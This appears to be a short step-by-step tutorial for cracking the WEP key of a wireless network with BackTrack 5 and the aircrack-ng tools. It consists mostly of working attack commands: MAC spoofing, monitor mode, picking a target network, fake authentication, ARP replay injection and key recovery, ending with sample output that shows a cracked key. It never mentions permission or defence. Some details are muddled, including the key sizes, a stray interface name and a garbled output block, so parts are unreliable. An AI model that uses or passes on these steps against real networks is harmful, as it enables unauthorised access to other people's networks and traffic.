We P Cracking
We P Cracking
We P Cracking
Using BackTrack 5 Download BackTrack 5 KDE 64-bit ISO http://www.backtrack-linux.org/backtrack/backtrack-5-release/ Create a bootable USB drive with UNetbootin http://unetbootin.sourceforge.net/ Reboot the compute with the USB drive inserted, make sure that the BIOS is set to boot from USB devices before HDD/Optical Drive Boot into Ubuntu. Delete the kcache files for startx may fail to load cd /root/.kde/ find . -type f -iname "*.kcache" -delete startx Open a new Konsole window. Obtain the network interface %INTERFACE% airmon-ng Set the network interface to monitor mode, spoof the interface MAC airmon-ng stop %INTERFACE% ifconfig %INTERFACE% down macchanger --mac 00:11:22:33:44:55 %INTERFACE% airmon-ng start %INTERFACE% Pick a target network. Take note of the access point human-readable name %ESSID%, access point MAC address %BSSID% and access point channel %CHANNEL%. airodump-ng %INTERFACE% Start monitoring the target network airodump-ng -c %CHANNEL% -w capturedata --bssid %BSSID% %INTERFACE% Open a new Konsole window. Associate the interface with the access point. A successful injection looks like: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-) aireplay-ng -1 0 -a %BSSID% -h 00:11:22:33:44:55 -e %ESSID% %INTERFACE% Keep sending a handshake packet to maintain the association. aireplay-ng -1 6000 -o 1 -q 10 -e %ESSID% -a %BSSID% -h 00:11:22:33:44:55 ath0 Open a new Konsole window. Create router traffic and start capturing packets. It will start capturing ARP requests and send packets at upwards of 500 per second. aireplay-ng -3 -b %BSSID% -h 00:11:22:33:44:55 %INTERFACE% Continue capturing packets for a while. An estimate 250,000 IVs are required for a 32-bit key and 1,500,000 IVs for a
64-bit key. Success was had after about 1.3M packets were received on a testing target. After enough packets have been captured open up a new Konsole window and decode the WEP key. aircrack-ng -b %BSSID% *.cap (Alternately try the FMS/Korek method) aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap If not successful, spend more time capturing packets. A successful attack looks like:
Aircrack-ng 0.9
[00:03:06] Tested 674449 keys (got 96610 IVs) KB 0 1 2 3 depth 0/ 9 0/ 8 0/ 2 1/ 5 byte(vote) 12( 15) F9( 34( 61) E8( 56( 87) A6( 78( 43) 1A(
??? PROFIT!
SSID: firefly WEP KEY: AF1B08A3E0